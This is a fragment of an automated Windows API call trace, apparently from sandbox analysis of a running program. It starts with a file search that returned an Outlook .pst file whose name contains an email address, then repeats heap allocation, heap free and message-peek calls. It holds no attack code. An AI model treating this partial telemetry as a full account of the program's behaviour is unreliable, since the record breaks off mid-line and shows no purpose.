ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 0 [0196.965] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0196.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0196.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.965] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0196.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0196.965] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0196.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0196.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0196.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0197.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0197.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 